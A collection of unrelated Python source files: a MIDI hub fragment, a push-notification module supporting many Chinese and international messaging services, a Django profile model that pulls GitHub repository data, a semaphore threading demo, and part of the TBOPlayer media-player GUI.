allow the sequence to be updated and stay alive until `stop` is
called.
Returns:
The MidiPlayer thread handling playback to enable updating.
"""
player = MidiPlayer(self._outport, sequence, start_time, allow_updates,
self._playback_channel, self._playback_offset)
with self._lock:
self._players.append(player)
player.start()
return player
@concurrency.serialized
def control_value(self, control_number):
"""Returns the most recently received value for the given control number.
Args:
control_number: The integer control number to return the value for, or
None.
Returns:
The most recently recieved integer value for the given control number, or
None if no values have been received for that control.
"""
if control_number is None:
return None
return self._control_values.get(control_number)
def send_control_change(self, control_number, value):
"""Sends the specified control change message on the output port."""
self._outport.send(
mido.Message(
type='control_change',
control=control_number,
value=value))
@concurrency.serialized
def register_callback(self, fn, signal):
"""Calls `fn` at the next signal message.
The callback function must take exactly one argument, which will be the
message triggering the signal.
Survives until signal is called or the MidiHub is destroyed.
Args:
fn: The callback function to call, passing in the triggering message.
signal: A MidiSignal to use as a signal to call `fn` on the triggering
message.
"""
self._callbacks[re.compile(str(signal))].append(fn)
|
notify_mtr.py
|
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
import base64
import hashlib
import hmac
import os
import re
import threading
import time
import urllib.parse
import json5 as json
import requests
from utils_env import get_file_path
# 原先的 print 函数和主线程的锁
_print = print
mutex = threading.Lock()
# 定义新的 print 函数
def print(text, *args, **kw):
"""
使输出有序进行,不出现多线程同一时间输出导致错乱的问题。
"""
with mutex:
_print(text, *args, **kw)
# 通知服务
# fmt: off
push_config = {
'HITOKOTO': False, # 启用一言(随机句子)
'BARK_PUSH': '', # bark IP 或设备码,例:https://api.day.app/DxHcxxxxxRxxxxxxcm/
'BARK_ARCHIVE': '', # bark 推送是否存档
'BARK_GROUP': '', # bark 推送分组
'BARK_SOUND': '', # bark 推送声音
'CONSOLE': True, # 控制台输出
'DD_BOT_SECRET': '', # 钉钉机器人的 DD_BOT_SECRET
'DD_BOT_TOKEN': '', # 钉钉机器人的 DD_BOT_TOKEN
'FSKEY': '', # 飞书机器人的 FSKEY
'GOBOT_URL': '', # go-cqhttp
# 推送到个人QQ:http://127.0.0.1/send_private_msg
# 群:http://127.0.0.1/send_group_msg
'GOBOT_QQ': '', # go-cqhttp 的推送群或用户
# GOBOT_URL 设置 /send_private_msg 时填入 user_id=个人QQ
# /send_group_msg 时填入 group_id=QQ群
'GOBOT_TOKEN': '', # go-cqhttp 的 access_token
'IGOT_PUSH_KEY': '', # iGot 聚合推送的 IGOT_PUSH_KEY
'PUSH_KEY': '', # server 酱的 PUSH_KEY,兼容旧版与 Turbo 版
'PUSH_PLUS_TOKEN': '', # push+ 微信推送的用户令牌
'PUSH_PLUS_USER': '', # push+ 微信推送的群组编码
'QMSG_KEY': '', # qmsg 酱的 QMSG_KEY
'QMSG_TYPE': '', # qmsg 酱的 QMSG_TYPE
'QYWX_AM': '', # 企业微信应用
'QYWX_KEY': '', # 企业微信机器人
'TG_BOT_TOKEN': '', # tg 机器人的 TG_BOT_TOKEN,例:1407203283:AAG9rt-6RDaaX0HBLZQq0laNOh898iFYaRQ
'TG_USER_ID': '', # tg 机器人的 TG_USER_ID,例:1434078534
'TG_API_HOST': '', # tg 代理 api
'TG_PROXY_AUTH': '', # tg 代理认证参数
'TG_PROXY_HOST': '', # tg 机器人的 TG_PROXY_HOST
'TG_PROXY_PORT': '', # tg 机器人的 TG_PROXY_PORT
}
notify_function = []
# fmt: on
# 首先读取 面板变量 或者 github action 运行变量
for k in push_config:
if v := os.getenv(k):
push_config[k] = v
# 读取配置文件中的变量 (会覆盖环境变量)
CONFIG_PATH = os.getenv("NOTIFY_CONFIG_PATH") or get_file_path("notify.json5")
if os.path.exists(CONFIG_PATH):
print(f"通知配置文件存在:{CONFIG_PATH}。")
try:
for k, v in dict(
json.load(open(CONFIG_PATH, mode="r", encoding="utf-8"))
).items():
if k in push_config:
push_config[k] = v
except ValueError:
print(
f"错误:配置文件 {CONFIG_PATH} 格式不对,请在 https://verytoolz.com/json5-validator.html 中检查格式"
)
elif CONFIG_PATH:
print(f"{CONFIG_PATH} 配置的通知文件不存在,请检查文件位置或删除对应环境变量!")
def bark(title: str, content: str) -> None:
"""
使用 bark 推送消息。
"""
if not push_config.get("BARK_PUSH"):
print("bark 服务的 BARK_PUSH 未设置!!\n取消推送")
return
print("bark 服务启动")
if push_config.get("BARK_PUSH").startswith("http"):
url = f'{push_config.get("BARK_PUSH")}/{urllib.parse.quote_plus(title)}/{urllib.parse.quote_plus(content)}'
else:
url = f'https://api.day.app/{push_config.get("BARK_PUSH")}/{urllib.parse.quote_plus(title)}/{urllib.parse.quote_plus(content)}'
bark_params = {
"BARK_ARCHIVE": "isArchive",
"BARK_GROUP": "group",
"BARK_SOUND": "sound",
}
params = ""
for pair in filter(
lambda pairs: pairs[0].startswith("BARK_")
and pairs[0] != "BARK_PUSH"
and pairs[1]
and bark_params.get(pairs[0]),
push_config.items(),
):
params += f"{bark_params.get(pair[0])}={pair[1]}&"
if params:
url = url + "?" + params.rstrip("&")
response = requests.get(url).json()
if response["code"] == 200:
print("bark 推送成功!")
else:
print("bark 推送失败!")
def console(title: str, content: str) -> None:
"""
使用 控制台 推送消息。
"""
print(f"{title}\n\n" f"{content}")
def dingding_bot(title: str, content: str) -> None:
"""
使用 钉钉机器人 推送消息。
"""
if not push_config.get("DD_BOT_SECRET") or not push_config.get("DD_BOT_TOKEN"):
print("钉钉机器人 服务的 DD_BOT_SECRET 或者 DD_BOT_TOKEN 未设置!!\n取消推送")
return
print("钉钉机器人 服务启动")
timestamp = str(round(time.time() * 1000))
secret_enc = push_config.get("DD_BOT_SECRET").encode("utf-8")
string_to_sign = "{}\n{}".format(timestamp, push_config.get("DD_BOT_SECRET"))
string_to_sign_enc = string_to_sign.encode("utf-8")
hmac_code = hmac.new(
secret_enc, string_to_sign_enc, digestmod=hashlib.sha256
).digest()
sign = urllib.parse.quote_plus(base64.b64encode(hmac_code))
url = f'https://oapi.dingtalk.com/robot/send?access_token={push_config.get("DD_BOT_TOKEN")}×tamp={timestamp}&sign={sign}'
headers = {"Content-Type": "application/json;charset=utf-8"}
data = {"msgtype": "text", "text": {"content": f"{title}\n\n{content}"}}
response = requests.post(
url=url, data=json.dumps(data, quote_keys=True), headers=headers, timeout=15
).json()
if not response["errcode"]:
print("钉钉机器人 推送成功!")
else:
print("钉钉机器人 推送失败!")
def feishu_bot(title: str, content: str) -> None:
"""
使用 飞书机器人 推送消息。
"""
if not push_config.get("FSKEY"):
print("飞书 服务的 FSKEY 未设置!!\n取消推送")
return
print("飞书 服务启动")
url = f'https://open.feishu.cn/open-apis/bot/v2/hook/{push_config.get("FSKEY")}'
data = {"msg_type": "text", "content": {"text": f"{title}\n\n{content}"}}
response = requests.post(url, data=json.dumps(data, quote_keys=True)).json()
if response.get("StatusCode") == 0:
print("飞书 推送成功!")
else:
print("飞书 推送失败!错误信息如下:\n", response)
def go_cqhttp(title: str, content: str) -> None:
"""
使用 go_cqhttp 推送消息。
"""
if not push_config.get("GOBOT_URL") or not push_config.get("GOBOT_QQ"):
print("go-cqhttp 服务的 GOBOT_URL 或 GOBOT_QQ 未设置!!\n取消推送")
return
print("go-cqhttp 服务启动")
url = f'{push_config.get("GOBOT_URL")}?access_token={push_config.get("GOBOT_TOKEN")}&{push_config.get("GOBOT_QQ")}&message=标题:{title}\n内容:{content}'
response = requests.get(url).json()
if response["status"] == "ok":
print("go-cqhttp 推送成功!")
else:
print("go-cqhttp 推送失败!")
def iGot(title: str, content: str) -> None:
"""
使用 iGot 推送消息。
"""
if not push_config.get("IGOT_PUSH_KEY"):
print("iGot 服务的 IGOT_PUSH_KEY 未设置!!\n取消推送")
return
print("iGot 服务启动")
url = f'https://push.hellyw.com/{push_config.get("IGOT_PUSH_KEY")}'
data = {"title": title, "content": content}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
response = requests.post(url, data=data, headers=headers).json()
if response["ret"] == 0:
print("iGot 推送成功!")
else:
print(f'iGot 推送失败!{response["errMsg"]}')
def serverJ(title: str, content: str) -> None:
"""
通过 serverJ 推送消息。
"""
if not push_config.get("PUSH_KEY"):
print("serverJ 服务的 PUSH_KEY 未设置!!\n取消推送")
return
print("serverJ 服务启动")
data = {"text": title, "desp": content.replace("\n", "\n\n")}
if push_config.get("PUSH_KEY").index("SCT") != -1:
url = f'https://sctapi.ftqq.com/{push_config.get("PUSH_KEY")}.send'
else:
url = f'https://sc.ftqq.com/${push_config.get("PUSH_KEY")}.send'
response = requests.post(url, data=data).json()
if response.get("errno") == 0 or response.get("code") == 0:
print("serverJ 推送成功!")
else:
print(f'serverJ 推送失败!错误码:{response["message"]}')
def pushplus_bot(title: str, content: str) -> None:
"""
通过 push+ 推送消息。
"""
if not push_config.get("PUSH_PLUS_TOKEN"):
print("PUSHPLUS 服务的 PUSH_PLUS_TOKEN 未设置!!\n取消推送")
return
print("PUSHPLUS 服务启动")
url = "http://www.pushplus.plus/send"
data = {
"token": push_config.get("PUSH_PLUS_TOKEN"),
"title": title,
"content": content,
"topic": push_config.get("PUSH_PLUS_USER"),
}
body = json.dumps(data, quote_keys=True).encode(encoding="utf-8")
headers = {"Content-Type": "application/json"}
response = requests.post(url=url, data=body, headers=headers).json()
if response["code"] == 200:
print("PUSHPLUS 推送成功!")
else:
print("PUSHPLUS 推送失败!")
def qmsg_bot(title: str, content: str) -> None:
"""
使用 qmsg 推送消息。
"""
if not push_config.get("QMSG_KEY") or not push_config.get("QMSG_TYPE"):
print("qmsg 的 QMSG_KEY 或者 QMSG_TYPE 未设置!!\n取消推送")
return
print("qmsg 服务启动")
url = f'https://qmsg.zendee.cn/{push_config.get("QMSG_TYPE")}/{push_config.get("QMSG_KEY")}'
payload = {"msg": f'{title}\n\n{content.replace("----", "-")}'.encode("utf-8")}
response = requests.post(url=url, params=payload).json()
if response["code"] == 0:
print("qmsg 推送成功!")
else:
print(f'qmsg 推送失败!{response["reason"]}')
def wecom_app(title: str, content: str) -> None:
"""
通过 企业微信 APP 推送消息。
"""
if not push_config.get("QYWX_AM"):
print("QYWX_AM 未设置!!\n取消推送")
return
QYWX_AM_AY = re.split(",", push_config.get("QYWX_AM"))
if 4 < len(QYWX_AM_AY) > 5:
print("QYWX_AM 设置错误!!\n取消推送")
return
print("企业微信 APP 服务启动")
corpid = QYWX_AM_AY[0]
corpsecret = QYWX_AM_AY[1]
touser = QYWX_AM_AY[2]
agentid = QYWX_AM_AY[3]
try:
media_id = QYWX_AM_AY[4]
except IndexError:
media_id = ""
wx = WeCom(corpid, corpsecret, agentid)
# 如果没有配置 media_id 默认就以 text 方式发送
if not media_id:
message = title + "\n\n" + content
response = wx.send_text(message, touser)
else:
response = wx.send_mpnews(title, content, media_id, touser)
if response == "ok":
print("企业微信推送成功!")
else:
print("企业微信推送失败!错误信息如下:\n", response)
class WeCom:
def __init__(self, corpid, corpsecret, agentid):
self.CORPID = corpid
self.CORPSECRET = corpsecret
self.AGENTID = agentid
def get_access_token(self):
url = "https://qyapi.weixin.qq.com/cgi-bin/gettoken"
values = {
"corpid": self.CORPID,
"corpsecret": self.CORPSECRET,
}
req = requests.post(url, params=values)
data = json.loads(req.text)
return data["access_token"]
def send_text(self, message, touser="@all"):
send_url = (
"https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token="
+ self.get_access_token()
)
send_values = {
"touser": touser,
"msgtype": "text",
"agentid": self.AGENTID,
"text": {"content": message},
"safe": "0",
}
send_msges = bytes(json.dumps(send_values, quote_keys=True), "utf-8")
respone = requests.post(send_url, send_msges)
respone = respone.json()
return respone["errmsg"]
def send_mpnews(self, title, message, media_id, touser="@all"):
send_url = (
"https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token="
+ self.get_access_token()
)
send_values = {
"touser": touser,
"msgtype": "mpnews",
"agentid": self.AGENTID,
"mpnews": {
"articles": [
{
"title": title,
"thumb_media_id": media_id,
"author": "Author",
"content_source_url": "",
"content": message.replace("\n", "<br/>"),
"digest": message,
}
]
},
}
send_msges = bytes(json.dumps(send_values, quote_keys=True), "utf-8")
respone = requests.post(send_url, send_msges)
respone = respone.json()
return respone["errmsg"]
def wecom_bot(title: str, content: str) -> None:
"""
通过 企业微信机器人 推送消息。
"""
if not push_config.get("QYWX_KEY"):
print("企业微信机器人 服务的 QYWX_KEY 未设置!!\n取消推送")
return
print("企业微信机器人服务启动")
url = f"https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key={push_config.get('QYWX_KEY')}"
headers = {"Content-Type": "application/json;charset=utf-8"}
data = {"msgtype": "text", "text": {"content": f"{title}\n\n{content}"}}
response = requests.post(
url=url, data=json.dumps(data, quote_keys=True), headers=headers, timeout=15
).json()
if response["errcode"] == 0:
print("企业微信机器人推送成功!")
else:
print("企业微信机器人推送失败!")
def telegram_bot(title: str, content: str) -> None:
"""
使用 telegram 机器人 推送消息。
"""
if not push_config.get("TG_BOT_TOKEN") or not push_config.get("TG_USER_ID"):
print("tg 服务的 bot_token 或者 user_id 未设置!!\n取消推送")
return
print("tg 服务启动")
if push_config.get("TG_API_HOST"):
url = f"https://{push_config.get('TG_API_HOST')}/bot{push_config.get('TG_BOT_TOKEN')}/sendMessage"
else:
url = (
f"https://api.telegram.org/bot{push_config.get('TG_BOT_TOKEN')}/sendMessage"
)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
payload = {
"chat_id": str(push_config.get("TG_USER_ID")),
"text": f"{title}\n\n{content}",
"disable_web_page_preview": "true",
}
proxies = None
if push_config.get("TG_PROXY_HOST") and push_config.get("TG_PROXY_PORT"):
if push_config.get("TG_PROXY_AUTH") is not None and "@" not in push_config.get(
"TG_PROXY_HOST"
):
push_config["TG_PROXY_HOST"] = (
push_config.get("TG_PROXY_AUTH")
+ "@"
+ push_config.get("TG_PROXY_HOST")
)
proxyStr = "http://{}:{}".format(
push_config.get("TG_PROXY_HOST"), push_config.get("TG_PROXY_PORT")
)
proxies = {"http": proxyStr, "https": proxyStr}
response = requests.post(
url=url, headers=headers, params=payload, proxies=proxies
).json()
if response["ok"]:
print("tg 推送成功!")
else:
print("tg 推送失败!")
def one() -> str:
"""
获取一条一言。
:return:
"""
url = "https://v1.hitokoto.cn/"
res = requests.get(url).json()
return res["hitokoto"] + " ----" + res["from"]
if push_config.get("BARK_PUSH"):
notify_function.append(bark)
if push_config.get("CONSOLE"):
notify_function.append(console)
if push_config.get("DD_BOT_TOKEN") and push_config.get("DD_BOT_SECRET"):
notify_function.append(dingding_bot)
if push_config.get("FSKEY"):
notify_function.append(feishu_bot)
if push_config.get("GOBOT_URL") and push_config.get("GOBOT_QQ"):
notify_function.append(go_cqhttp)
if push_config.get("IGOT_PUSH_KEY"):
notify_function.append(iGot)
if push_config.get("PUSH_KEY"):
notify_function.append(serverJ)
if push_config.get("PUSH_PLUS_TOKEN"):
notify_function.append(pushplus_bot)
if push_config.get("QMSG_KEY") and push_config.get("QMSG_TYPE"):
notify_function.append(qmsg_bot)
if push_config.get("QYWX_AM"):
notify_function.append(wecom_app)
if push_config.get("QYWX_KEY"):
notify_function.append(wecom_bot)
if push_config.get("TG_BOT_TOKEN") and push_config.get("TG_USER_ID"):
notify_function.append(telegram_bot)
def excepthook(args, /):
if issubclass(args.exc_type, requests.exceptions.RequestException):
print(
f"网络异常,请检查你的网络连接、推送服务器和代理配置,该错误和账号配置无关。信息:{str(args.exc_type)}, {args.thread.name}"
)
else:
global default_hook
default_hook(args)
default_hook = threading.excepthook
threading.excepthook = excepthook
def send(title: str, content: str) -> None:
if not content:
print(f"{title} 推送内容为空!")
return
hitokoto = push_config.get("HITOKOTO")
text = one() if hitokoto else ""
content += "\n\n" + text
ts = [
threading.Thread(target=mode, args=(title, content), name=mode.__name__)
for mode in notify_function
]
[t.start() for t in ts]
[t.join() for t in ts]
def main():
send("title", "content")
if __name__ == "__main__":
main()
|
models.py
|
from django.db import models
from django.contrib.auth.models import User
from io import BytesIO
from PIL import Image
from django.core.files import File
import requests
from threading import Thread
from posts import models as post_models
def compress(image):
im = Image.open(image)
if im.mode in ("RGBA","P"):
im = im.convert("RGB")
im_io = BytesIO()
im = im.resize((150,150))
im.save(im_io, 'JPEG', quality=60)
new_image = File(im_io, name=image.name)
return new_image
class Profile(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
name = models.CharField(max_length=80)
email = models.EmailField()
location = models.CharField(max_length=255)
profile_picture = models.ImageField(upload_to='media/images/profile_picture', max_length=500)
bio = models.TextField()
website = models.URLField(blank=True)
followers = models.ManyToManyField('Profile',related_name='followed_by')
following = models.ManyToManyField('Profile')
gitlab_url = models.URLField(blank=True)
behance_url = models.URLField(blank=True)
instagram_url = models.URLField(blank=True)
github_url = models.URLField(blank=True)
def __str__(self):
return str(self.user.username)
def save(self, *args, **kwargs):
t = Thread(target=GithubTask(self.user))
t.start()
self.profile_picture = compress(self.profile_picture)
super().save(*args, **kwargs)
def get_post_count(self):
posts = post_models.Post.objects.filter(author=self.user)
return posts.count()
class GitHubRepo(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
name = models.CharField(max_length=255)
description = models.TextField(blank=True)
top_language = models.CharField(max_length=255,blank=True)
stars = models.IntegerField(blank=True)
fork = models.BooleanField(default=False)
url = models.URLField(blank=True)
def __str__(self) -> str:
return str(self.name)
class GitHubProfile(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
repos = models.ManyToManyField(GitHubRepo)
def __str__(self) -> str:
return str(self.user)
def GithubTask(user):
r = requests.get(f'https://gh-pinned-repos-5l2i19um3.vercel.app/?username={user}')
response = r.json()
gh = GitHubProfile.objects.filter(user=user)
if not gh.exists():
for i in response:
name = i['repo']
description = i['description']
try:
language = i['language']
except KeyError:
language = ''
stars = i['stars']
url = i['link']
gh_repo = GitHubRepo(user=user,
name=name,
description=description,
top_language=language,
stars=stars,
fork=False,
url=url
)
gh_repo.save()
gh_profile = GitHubProfile(user=user)
gh_profile.save()
gh_repos = GitHubRepo.objects.filter(user=user)
for i in gh_repos:
gh_profile.repos.add(i)
gh_profile.save()
for i in gh_repos:
req = requests.get(f'https://api.github.com/repos/{i.user.username}/{i.name}')
res = req.json()
if res['fork'] == True:
i.fork = True
i.save()
|
semaphore_objects_01_bounded.py
|
import threading
from time import sleep
N_MAX_CLIENTS_LOGGED_SIMULNANEOUSLY: int = 3
N_CLIENTS: int = 15
semaphore = threading.BoundedSemaphore(value=N_MAX_CLIENTS_LOGGED_SIMULNANEOUSLY)
def client() -> None:
semaphore.acquire()
print(f'\n{threading.current_thread().name} -> logged in -> N ACTIVED THREADS: {threading.active_count()}')
sleep(3)
print(f'\n{threading.current_thread().name} -> logging out')
sleep(1)
semaphore.release()
for i in range(N_CLIENTS):
threading.Thread(name=f'client_{i}', target=client).start()
|
tboplayer.py
|
"""
A GUI interface using jbaiter's pyomxplayer to control omxplayer
INSTALLATION
***
* TBOPlayer requires avconv, youtube-dl, and also the python libraries requests, gobject2, gtk2, pexpect and ptyprocess to be installed in order to work.
*
* -------------------------
*
* To install TBOPlayer and all required libraries, you can simply use the following command from tboplayer directory:
*
* chmod +x setup.sh
* ./setup.sh
*
* -------------------------
*
* See README.md file for more details on installation
*
OPERATION
Menus
====
Track - Track - add tracks (for selecting multiple tracks, hold ctrl when clicking) or directories or URLs, edit or remove tracks from the current playlist
Playlist - save the current playlist or open a saved one or load youtube playlist
OMX - display the track information for the last played track (needs to be enabled in options)
Options -
Audio Output - play sound to hdmi or local output, auto does not send an audio option to omxplayer.
Mode - play the Single selected track, Repeat the single track, rotate around the Playlist starting from the selected track, randomly play a track from the Playlist.
Initial directory for tracks - where Add Track starts looking.
Initial directory for playlists - where Open Playlist starts looking
Enable subtitles
OMXPlayer location - path to omxplayer binary
OMXplayer options - add your own (no validation so be careful)
Download from Youtube - defines whether to download video and audio or audio only from Youtube (other online video services will always be asked for "video and audio")
Download actual media URL [when] - defines when to extract the actual media from the given URL, either upon adding the URL or when playing it
Youtube video quality - lets you choose between "small", "medium" and "high" qualities (Youtube only feature)
youtube-dl location - path to youtube-dl binary
Start/End track paused - Pauses the track both in the beginning and in the end of the track
Autoplay on start up - If TBOPlayer has just been opened and has some file in the playlist, automatically satrt playing the first file in the list
Forbid windowed mode - if enabled will make videos always show in full screen, disabling the video window mode and video progress bar - useful if you're using tboplayer through a remote desktop
Debug - prints some debug text to the command line
* See README.md file for more details on operation in the OPERATION section
TODO (maybe)
--------
sort out black border around some videos
gapless playback, by running two instances of pyomxplayer
read and write m3u and pls playlists
PROBLEMS
---------------
I think I might have fixed this but two tracks may play at the same time if you use the controls quickly, you may need to SSH in form another computer and use top -upi and k to kill the omxplayer.bin
"""
from options import *
from ytdl import *
from omxplayer import *
from playlist import *
from dnd import *
from dbusinterface import *
from htmlparsers import *
from scrolledframe import *
from debugging import *
from threading import Thread
from time import sleep
from pprint import ( pformat, pprint )
from random import randint
from math import log10
from magic import from_file
from youtubesearchpython import SearchVideos
import gettext
import json
import re
import string
import sys
from Tkinter import *
from ttk import ( Progressbar, Style, Sizegrip )
from gtk.gdk import ( screen_width, screen_height )
import Tkinter as tk
import tkFileDialog
import tkMessageBox
import tkSimpleDialog
import tkFont
options = Options()
try:
gettext.translation('tboplayer', localedir=sys.path[0] + '/locale', languages=[options.lang]).install()
except:
_ = lambda x:x
#**************************
# TBOPLAYER CLASS
# *************************
class TBOPlayer:
# regular expression patterns
RE_RESOLUTION = re.compile("^([0-9]+)x([0-9]+)$")
RE_COORDS = re.compile("^([\+-][0-9]+)([\+-][0-9]+)$")
_SUPPORTED_MIME_TYPES = ('video/x-msvideo', 'video/quicktime', 'video/mp4', 'video/x-flv', 'video/x-matroska', 'audio/x-matroska',
'video/3gpp', 'audio/x-aac', 'video/h264', 'video/h263', 'video/x-m4v', 'audio/midi',
'audio/mid', 'audio/vnd.qcelp', 'audio/mpeg', 'video/mpeg', 'audio/rmf', 'audio/x-rmf',
'audio/mp4', 'video/mj2', 'audio/x-tta', 'audio/tta', 'application/mp4', 'audio/ogg',
'video/ogg', 'audio/wav', 'audio/wave' ,'audio/x-pn-aiff', 'audio/x-pn-wav', 'audio/x-wav',
'audio/flac', 'audio/x-flac', 'video/h261', 'application/adrift', 'video/3gpp2', 'video/x-f4v',
'application/ogg', 'audio/mpeg3', 'audio/x-mpeg-3', 'audio/x-gsm', 'audio/x-mpeg', 'audio/mod',
'audio/x-mod', 'video/x-ms-asf', 'audio/x-pn-realaudio', 'audio/x-realaudio' ,'video/vnd.rn-realvideo', 'video/fli',
'video/x-fli', 'audio/x-ms-wmv', 'video/avi', 'video/msvideo', 'video/m4v', 'audio/x-ms-wma',
'application/octet-stream', 'application/x-url', 'text/url', 'text/x-url', 'application/vnd.rn-realmedia', 'video/webm',
'audio/webm', 'audio/vnd.rn-realaudio', 'audio/x-pn-realaudio', 'audio/x-realaudio', 'audio/aiff', 'audio/x-aiff')
YTDL_MSGS = (_("Problem retreiving content. Do you have up-to-date dependencies?"),
_("Problem retreiving content. Content may be copyrighted or the link may be invalid."),
_("Problem retrieving content. Content may have been truncated."))
YTDL_WAIT_TAG = "[" + _("wait") + "]"
progress_bar_total_steps = 200
progress_bar_step_rate = 0
volume_max = 60
volume_normal_step = 40
volume_critical_step = 49
# ***************************************
# # PLAYING STATE MACHINE
# ***************************************
"""self. play_state controls the playing sequence, it has the following values.
I am not entirely sure the startign and ending states are required.
- omx_closed - the omx process is not running, omx process can be initiated
- omx_starting - omx process is running but is not yet able to receive commands
- omx_playing - playing a track, commands can be sent
- omx_ending - omx is doing its termination, commands cannot be sent
"""
def init_play_state_machine(self):
self._OMX_CLOSED = "omx_closed"
self._OMX_STARTING = "omx_starting"
self._OMX_PLAYING = "omx_playing"
self._OMX_ENDING = "omx_ending"
self._YTDL_CLOSED = "ytdl_closed"
self._YTDL_STARTING = "ytdl_starting"
self._YTDL_WORKING = "ytdl_working"
self._YTDL_ENDING = "ytdl_ending"
# what to do next signals
self.break_required_signal=False # signal to break out of Repeat or Playlist loop
self.play_previous_track_signal = False
self.play_next_track_signal = False
# playing a track signals
self.stop_required_signal=False
self.play_state=self._OMX_CLOSED
self.quit_sent_signal = False # signal that q has been sent
self.paused=False
# playing a track signals
self.ytdl_state=self._YTDL_CLOSED
self.quit_ytdl_sent_signal = False # signal that q has been sent
# whether omxplayer dbus is connected
self.dbus_connected = False
self.start_track_index = None
self.omx = None
self.autolyrics = None
# kick off the state machine by playing a track
def play(self):
#initialise all the state machine variables
if self.play_state==self._OMX_CLOSED and self.playlist.track_is_selected():
self.ytdl.reset_subtitle_attributes()
self.iteration = 0 # for debugging
self.paused = False
self.stop_required_signal=False # signal that user has pressed stop
self.quit_sent_signal = False # signal that q has been sent
self.playing_location = self.playlist.selected_track_location
self.play_state=self._OMX_STARTING
self.dbus_connected = False
self._cued = False
#play the selelected track
index = self.playlist.selected_track_index()
self.display_selected_track(index)
self.start_omx(self.playlist.selected_track_location)
self.play_state_machine()
self.set_play_button_state(1)
def play_state_machine(self):
# self.monitor ("******Iteration: " + str(self.iteration))
self.iteration +=1
if self.play_state == self._OMX_CLOSED:
self.monitor(" State machine: " + self.play_state)
self.what_next()
return
elif self.play_state == self._OMX_STARTING:
self.monitor(" State machine: " + self.play_state)
# if omxplayer is playing the track change to play state
if self.omx and self.omx.start_play_signal==True:
self.monitor(" <start play signal received from omx")
self.omx.start_play_signal=False
self.play_state=self._OMX_PLAYING
self.monitor(" State machine: omx_playing started")
self.dbus_connected = self.omx.init_dbus_link()
self.show_progress_bar()
self.set_progress_bar()
if self.media_is_video() and not self.options.forbid_windowed_mode:
self.create_vprogress_bar()
if self.dbus_connected:
self.omx.set_aspect_mode(OMXPlayer.AM_LETTERBOX)
if self.options.cue_track_mode:
self.toggle_pause()
if self.options.find_lyrics:
self.grab_lyrics()
else:
if self.ytdl_state == self._YTDL_CLOSED:
self.play_state=self._OMX_CLOSED
self.monitor(" youtube-dl failed, stopping omx state machine")
else:
self.monitor(" OMXPlayer did not start yet.")
self.root.after(350, self.play_state_machine)
elif self.play_state == self._OMX_PLAYING :
# service any queued stop signals
if self.stop_required_signal==True :#or (self.omx and (self.omx.end_play_signal or self.omx.failed_play_signal)):
self.monitor(" Service stop required signal")
self.stop_omx()
self.stop_required_signal=False
else:
# quit command has been sent or omxplayer reports it is terminating so change to ending state
if self.quit_sent_signal == True or self.omx.end_play_signal== True or not self.omx.is_running():
if self.quit_sent_signal:
self.monitor(" quit sent signal received")
self.quit_sent_signal = False
if self.omx.end_play_signal:
self.monitor(" <end play signal received")
self.monitor(" <end detected at: " + str(self.omx.position))
self.play_state =self._OMX_ENDING
self.reset_progress_bar()
if self.media_is_video():
self.destroy_vprogress_bar()
self.do_playing()
self.root.after(350, self.play_state_machine)
elif self.play_state == self._OMX_ENDING:
self.monitor(" State machine: " + self.play_state)
# if spawned process has closed can change to closed state
self.monitor (" State machine : is omx process running - " + str(self.omx.is_running()))
if self.omx.is_running() ==False:
#if self.omx.end_play_signal==True: #this is not as safe as process has closed.
self.monitor(" <omx process is dead")
self.play_state = self._OMX_CLOSED
self.dbus_connected = False
self.do_ending()
if self.autolyrics:
self.autolyrics.destroy()
self.autolyrics = None
self.root.after(350, self.play_state_machine)
# do things in each state
def do_playing(self):
# we are playing so just update time display
# self.monitor("Position: " + str(self.omx.position))
if self.paused == False:
time_string = self.time_string(self.omx.position)
if self.omx.timenf:
time_string += "\n/ " + self.time_string(self.omx.timenf['duration'])
self.display_time.set(time_string)
if abs(self.omx.position - self.progress_bar_var.get()) > self.progress_bar_step_rate:
self.set_progress_bar_step()
if self.options.cue_track_mode and not self._cued and self.omx.timenf and self.omx.position >= self.omx.timenf['duration'] - 1:
self.toggle_pause()
self._cued = True
else:
self.display_time.set(_("Paused"))
def do_starting(self):
self.display_time.set(_("Starting"))
return
def do_ending(self):
# we are ending so just write End to the time display
self.display_time.set(_("End"))
self.hide_progress_bar()
# respond to asynchrous user input and send signals if necessary
def play_track(self):
""" respond to user input to play a track, ignore it if already playing
needs to start playing and not send a signal as it is this that triggers the state machine.
"""
self.monitor(">play track received")
if self.play_state == self._OMX_CLOSED:
self.start_track_index = self.playlist.selected_track_index()
self.play()
elif self.play_state == self._OMX_PLAYING and not (self.stop_required_signal or self.break_required_signal):
self.toggle_pause()
def play_track_by_index(self, track_index=0):
if self.play_state == self._OMX_CLOSED:
self.playlist.select(track_index)
self.play_track()
return
elif (track_index == self.start_track_index
and self.play_state == self._OMX_PLAYING):
self.toggle_pause()
return
self.stop_track()
def play_after():
self.playlist.select(track_index)
self.play_track()
self.root.after(1200, play_after)
def skip_to_next_track(self):
# send signals to stop and then to play the next track
if self.play_state == self._OMX_PLAYING:
self.monitor(">skip to next received")
self.monitor(">stop received for next track")
self.stop_required_signal=True
self.play_next_track_signal=True
def skip_to_previous_track(self):
# send signals to stop and then to play the previous track
if self.play_state == self._OMX_PLAYING:
self.monitor(">skip to previous received")
self.monitor(">stop received for previous track")
self.stop_required_signal=True
self.play_previous_track_signal=True
def stop_track(self):
# send signals to stop and then to break out of any repeat loop
if self.play_state == self._OMX_PLAYING:
self.monitor(">stop received")
self.start_track_index=None
self.stop_required_signal=True
self.break_required_signal=True
self.hide_progress_bar()
self.set_play_button_state(0)
def toggle_pause(self):
"""pause clicked Pauses or unpauses the track"""
if self.play_state == self._OMX_PLAYING:
self.send_command('p')
if self.paused == False:
self.paused=True
self.set_play_button_state(0)
else:
if(self.options.cue_track_mode and self._cued):
self.stop_omx()
self.paused=False
self.set_play_button_state(1)
def set_play_button_state(self, state):
if state == 0:
self.play_button['text'] = _('Play')
elif state == 1:
self.play_button['text'] = _('Pause')
def volminusplus(self, event):
if event.x < event.widget.winfo_width()/2:
self.volminus()
else:
self.volplus()
def volplus(self):
self.send_command('+')
